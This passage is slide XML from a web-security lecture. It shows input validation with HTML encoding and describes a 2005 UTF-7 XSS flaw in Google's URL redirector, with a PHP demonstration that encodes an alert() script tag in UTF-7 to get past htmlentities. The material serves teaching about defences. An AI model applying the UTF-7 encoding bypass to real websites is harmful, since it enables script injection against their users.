          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Rounded Rectangle 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="378810" y="3061875"/>
              <a:ext cx="8153400" cy="29718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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent2">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="7030A0"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>&lt;%</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" indent="0" algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>2  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>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strLabel</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"label"</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3  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>if</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>strLabel.matches</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"^[a-zA-Z0-9]+$"</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>) == </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>false</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>) error();</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" indent="0" algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>4  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="7030A0"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>%&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" indent="0" algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>5</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" indent="0" algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>6  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="7030A0"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>&lt;P&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" indent="0" algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>7</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent2">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Label: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="7030A0"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>&lt;%=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent2">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>encodeHTML</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>strLabel</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>)</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent2">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="7030A0"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>%&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t/>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>8  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="7030A0"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>&lt;/P&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="14" name="Straight Connector 9"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="5400000">
              <a:off x="-617830" y="4547776"/>
              <a:ext cx="2971802"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03781"/>
            <a:ext cx="868911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Real World – Google's URL Redirection </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="954790"/>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r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>In 2005, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Watchfire</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> reported the following XSS issue with Google …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Georgia" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Georgia" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The script  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>http://www.google.com/url?q=  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>was used for redirecting the browser from Google's website to other sites.  When the parameter q was passed to the script in an illegal format, a "403 Forbidden" page was returned to the user, informing them that the query was illegal. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The parameter's value appeared in the html returned to the user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Georgia" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Georgia" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>For example, if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>http://www.google.com/url?q=EVIL_INPUT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> was requested, the text in the "403 Forbidden" response would have been: - "Your client does not have permission to get URL /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>url?q</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=EVIL_INPUT from this server."</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Georgia" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Georgia" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>While Google escaped common characters used for XSS, such angle brackets and apostrophes, it failed to handle hazardous UTF-7 encoded payloads. Therefore, when sending an XSS attack payload encoded in UTF-7, the payload would return in the response without being altered.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Georgia" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="341312" lvl="1" indent="0">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Georgia" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="682625" lvl="2" indent="0">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>header(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0810B8"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>'Content-Type: text/html; charset=UTF-7'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="682625" lvl="2" indent="0">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>$string = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0810B8"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>"&lt;script&gt;alert('XSS');&lt;/script&gt;"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="682625" lvl="2" indent="0">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>$string = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>mb_convert_encoding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>($string, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0810B8"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>'UTF-7'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="682625" lvl="2" indent="0">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>echo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>htmlentities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>($string, ENT_QUOTES, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0810B8"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>'UTF-8‘</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="341312" lvl="1" indent="0">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Georgia" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 2" descr="http://shiflett.org/images/xss-popup.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5580112" y="4548559"/>
            <a:ext cx="1714500" cy="1190625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>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latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
